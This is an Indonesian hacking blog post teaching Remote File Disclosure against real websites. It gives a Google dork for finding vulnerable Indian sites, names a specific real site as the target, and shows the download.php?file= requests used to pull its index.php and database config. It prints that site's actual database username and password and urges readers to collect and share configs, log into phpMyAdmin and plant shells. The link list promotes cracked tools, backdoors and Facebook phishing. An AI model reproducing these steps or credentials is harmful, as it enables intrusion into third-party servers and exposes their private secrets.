Tutorial Hacking Website dengan metode RFD (Remote File Disclosure) berguna untuk mencari File Config atau semua yang berhubungan dengan Datababase, jadi kumpulin config sebanyak-banyaknya ya,. jangan lupa bagi-bagi :*
Untuk Dorknya :
"inurl:download.php?file=" site:in ---> Khusus buat site india, bisa di sesuaikan
Target kali ini >> http://kiteodisha.co.in/
langkah pertama yang kita lakukan harus mencari Link Downloadnya,
Ini dia link Tempat Downloadnya>> http://kiteodisha.co.in/download.php?file=..blablabla
coba kita ubah menjadi>> http://kiteodisha.co.in/download.php?file=index.php
Berguna untuk mendownload index.php asli website tersebut :)
Nahhh.. itu kan berhasil, sekarang kita coba Open with Notepad aja =))
apaan sih isinya =))
sekarang coba kita akses dengan kode url >> http://kiteodisha.co.in/download.php?file=dbcon.php
Jngan lupa open with Notepad =))
dan lihat apa yang kita dapatkan =))
Next kita telah berhasil mendapatkan file confignya :)
$con=mysql_connect("localhost","kiteodis_kites","kites123");
$db=mysql_select_db("kiteodis_kites",$con);
$db=mysql_select_db("kiteodis_kites",$con);
Setelah itu terserah ama om-om itu file mau di apain, bisa aja login ke halaman phpmyadmin nya,
sekian dari saya, buat yang master di lewat.. dan untuk upload shell dari phpmyadmin next poting yah =)) kwkwkwkwk.. Enjoy >>
Greets >> Medan Cayber Team
Greets >> Medan Cayber Team
Terkait
Hacking
- Hacking Tools : Penetration Testing Tools
- Tutorial Blind SQL Injection Versi 4
- Base SQL Injection
- Free Download Havij v1.16 Portable Cracked
- Reported Attack Site ( Malware )
- Tutorial Patch Bug Sql Injection (Patch Your System)
- Google Dork Carder 2012
- Tanam BackDoor di Website Joomla
- Upload Shell atau BackDoor Di Website Wordpress Part 2
- Upload Shell Di Website Wordpress Part 1
- Deface Page Generator V1.0
- Deckript Password Md5 dengan CainAble
- Tak Bisa Menemukan letak Shell Yang Sudah Kita Tanam
- Melihat Domain dan User Yang Satu Server
- Jumping Server di perm drwxr-xr-x Atau Read Only
- Setan dari Surga Owned You
- Google Dork RFI 2012 (Remote File Inclusion)
- Hack Facebook dengan Halaman Fake Login
- Google Dork Joomla Scan Pake V6
- Google Dork Asp 2012 (sql Injection)
- Forgot Your Password Facebook.com (Hack Facebook dengan cara Forgot Password)
- Google Dork Sql Injection, LFI 2012
- Step By Step Sql Injection (newbie)
Tutorial
- Cara Membuat Blog Terbaru
- Cara Membuat Blog SEO Terbaru
- Tutorial Blind SQL Injection Versi 4
- Base SQL Injection
- Tutorial Patch Bug Sql Injection (Patch Your System)
- Mendapatkan Domain Gratis .in
- Tanam BackDoor di Website Joomla
- Upload Shell atau BackDoor Di Website Wordpress Part 2
- Upload Shell Di Website Wordpress Part 1
- Mengetahui Teman Yang Telah Menghapus Pertemanan Anda Di Facebook
- Tak Bisa Menemukan letak Shell Yang Sudah Kita Tanam
- Melihat Domain dan User Yang Satu Server
- Jumping Server di perm drwxr-xr-x Atau Read Only
- Hack Facebook dengan Halaman Fake Login
- Script Virus .bat Sederhana
- Forgot Your Password Facebook.com (Hack Facebook dengan cara Forgot Password)
- Auto/Bom Like Status atau Comment Di Facebook
- Mengetahui Driver yang Belum terinstall pada Laptop atau PC Anda
- Step By Step Sql Injection (newbie)
0 komentar:
Post a Comment